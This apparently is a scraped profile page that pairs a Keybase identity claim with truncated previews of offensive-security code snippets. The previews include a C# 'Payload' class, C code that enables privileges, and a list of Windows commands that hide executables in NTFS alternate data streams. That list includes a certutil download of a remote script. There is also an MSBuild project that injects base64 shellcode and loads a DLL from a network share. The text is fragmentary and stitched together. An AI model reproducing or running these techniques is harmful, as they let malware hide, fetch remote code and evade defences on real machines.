I hereby claim:
- I am 753c33686578 on github.
- I am 753c33686578 (https://keybase.io/753c33686578) on keybase.
- I have a public key ASDBt6J12LSYoCKOUT010GRF9tApLWk1OLjTYmgZ_ou5sgo
To claim this, I am signing this object:
using System; | |
using System.IO; | |
using System.Net; | |
using System.Diagnostics; | |
using System.IO.Compression; | |
using System.Runtime.InteropServices; | |
public class Payload | |
{ | |
public Payload() |
#include "stdafx.h" | |
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) { | |
TOKEN_PRIVILEGES tp; | |
LUID luid; | |
TOKEN_PRIVILEGES tpPrevious; | |
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES); | |
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE; |
###Add content to ADS### | |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="MyTarget"> | |
<SimpleTask MyProperty="My voice is my passport." | |
MyCode='<base64 encoded x64 shellcode>' | |
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/> | |
</Target> | |
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" /> | |
</Project> | |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace BlockDllTest | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ |
I hereby claim:
To claim this, I am signing this object: